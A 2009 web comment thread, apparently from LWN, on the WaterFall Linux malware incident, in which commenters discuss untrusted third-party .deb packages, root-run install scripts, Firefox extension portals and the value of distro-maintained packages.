User: Password:
Subscribe / Log in / New account

Linux malware: an incident and some solutions

Linux malware: an incident and some solutions

Posted Dec 24, 2009 12:49 UTC (Thu) by rickmoen (subscriber, #6943)
Parent article: Linux malware: an incident and some solutions

It's unfortunate that nearly all articles about Unix malware start by thrashing the same stupid straw man about "Linux users like to think that they are not vulnerable". Any operating system that permits the user to destroy his/her own system's security is "vulnerable" in that trivial and rather meaningless sense of the word, and Unix furnishes the rope to hang yourself, spare blocks and tackles, and a few rope factories and foundries in case you want to make more.

So, when has it ever not been the case that "they too should be careful"?

The .deb was "on" in the technical sense that it was made available by its third-party author at some URL of the form files/[something].deb, but even a cursory look at the site should have revealed to any member of the public that the site maintainers do effectively zero quality control, that it's an automated "portal" where "Everyone can upload and download artwork, applications, documents and other files."

So, it should have been obvious that the downloaded file was from nobody in particular, for starters -- but then there's the fact that it's a .deb, which requires root/sudo to install, and inherently supports preinst/postinst scripts, run as root.

None of which in the least differs from Koen Vervloesem's point that "An incident like the WaterFall malware can only be avoided when users are trained not to trust third-party software blindly", which is well taken, but there's only so much that can be done to dissuade novice sysadmins from destroying their systems. If they're willing to install as the root user software from unknown parties on the Internet just so they can have "the newest screen savers, themes, and other software to spice up their desktop", the best you can do is gently point them to the CERT document on recovery from root compromise and say "Gosh, it hurts when you shoot at your own foot, doesn't it?"

Even with "more software than the official repositories have", if it's not alleged screensavers, it'll be alleged Internet poker games, alleged video codecs for porn, alleged "birthday cards", etc. -- or various and sundry add-on Web apps.

The only way out is to keep reminding users they're responsible for whom they trust and what processes they run, teach them not to aim that gun at their feet, and teach them how to recognise that type of foot wound and how it got there.

Rick Moen

(Log in to post comments)

Linux malware: an incident and some solutions

Posted Dec 24, 2009 19:11 UTC (Thu) by rickmoen (subscriber, #6943) [Link]

And, I forgot to mention: Firefox extensions. I note that the Mozilla Organization's "portal" site contributes substantially to the problem of dangerous user attitudes, by having no entry about source code or licensing on any of the extension entries, but a large, prominent button marked "Download Now" on each. I've encountered Linux users who've been completely unaware that what they fetched via that site was proprietary software from nobody in particular, that they would not have trusted with their user-level security access if they'd been thinking more clearly.

I suggest we of the Linux community work harder to get out the message that, e.g., just because we recommend Adblock and NoScript, that doesn't mean we recommend downloading arbitrary extensions from any-old-where, and that, when we provide URLs to Adblock and NoScript's upstream Web sites, we don't mean you should get it from there: You should get maintained, audited packages from your distro maintainers, where available -- and assume code is dangerous unless you have reason to think it isn't.

Rick Moen

NoScript and Adblock

Posted Dec 25, 2009 3:10 UTC (Fri) by pflugstad (subscriber, #224) [Link]

I completely agree with you. But then you went and mentioned NoScript and AdBlock:



NoScript and Adblock

Posted Dec 26, 2009 7:48 UTC (Sat) by rickmoen (subscriber, #6943) [Link]

Pete wrote:

{shrug} The best solution to upstream antics is the one Jake Edge mentions, distro packages, which I always strongly, strongly encourage Linux newcomers to favour over going to upstream (absent rare reasons to the contrary). But NoScript / Adblock even with upstream antics are better than lacking them. Fortunately, both extensions are open source -- as many extensions advertised on are not.

(My view, yours for a small royalty fee and waiver of reverse-engineering rights).

Rick Moen

Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds